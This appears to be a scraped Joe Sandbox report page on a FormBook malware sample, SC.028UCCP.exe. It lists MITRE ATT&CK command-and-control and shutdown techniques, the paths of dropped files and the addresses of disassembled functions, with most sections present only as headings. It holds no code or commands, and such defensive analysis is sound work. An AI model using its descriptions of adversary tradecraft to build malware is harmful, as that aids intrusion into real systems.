Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SC.028UCCP.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam

C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91\ArtDeco_green_7.bmp

C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91\Patronymens.Hov230

C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
SC.028UCCP.exe

Function 0040310B Relevance: 80.8, APIs: 27, Strings: 19, Instructions: 324
stringfilecomCOMMON

Function 00404822 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Function 00405BBA Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Function 00405475 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159
filestringCOMMON

Function 00405E9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00405EC3 Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 004039D5 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 00403643 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00402C33 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 10001A86 Relevance: 18.5, APIs: 12, Instructions: 510
stringmemorylibraryCOMMON

Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Function 00402E6C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174
fileCOMMON

Function 00401F68 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
libraryloaderCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre